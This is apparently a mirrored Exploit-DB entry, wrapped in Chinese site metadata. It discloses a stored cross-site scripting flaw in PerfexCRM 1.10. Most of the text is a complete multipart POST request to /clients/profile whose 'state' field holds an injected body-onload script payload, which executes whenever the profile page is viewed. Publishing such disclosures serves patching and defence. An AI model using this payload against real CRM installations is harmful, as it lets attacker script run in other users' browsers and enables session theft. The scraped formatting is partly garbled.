perfexcrm 1.10 – ‘State’ Stored Cross-site scripting (XSS)

• Exploit Database
• 162 阅读

• 作者： Alhasan Abbas
  日期： 2021-07-06
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50097/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141

  # Exploit Title: perfexcrm 1.10 - &apos;State&apos; Stored Cross-site scripting (XSS) # Date: 05/07/2021 # Exploit Author: Alhasan Abbas (exploit.msf) # Vendor Homepage: https://www.perfexcrm.com/ # Version: 1.10 # Tested on: windows 10   Vunlerable page: /clients/profile   POC: ---- POST /clients/profile HTTP/1.1   Host: localhost   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058   Content-Length: 1548   Origin: http://localhost   Connection: close   Referer: http://localhost/clients/profile   Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038   Upgrade-Insecure-Requests: 1       -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="profile"       1   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="profile_image"; filename=""   Content-Type: application/octet-stream           -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="firstname"       adfgsg   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="lastname"       fsdgfdg   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="company"       test   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="vat"       1   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="phonenumber"           -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="country"       105   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="city"       asdf   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="address"       asdf   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="zip"       313   -----------------------------325278703021926100783634528058   Content-Disposition: form-data; name="state"       ""><body onload=alert("XSS")>">   -----------------------------325278703021926100783634528058--   then any one open profile page in user the xss its executed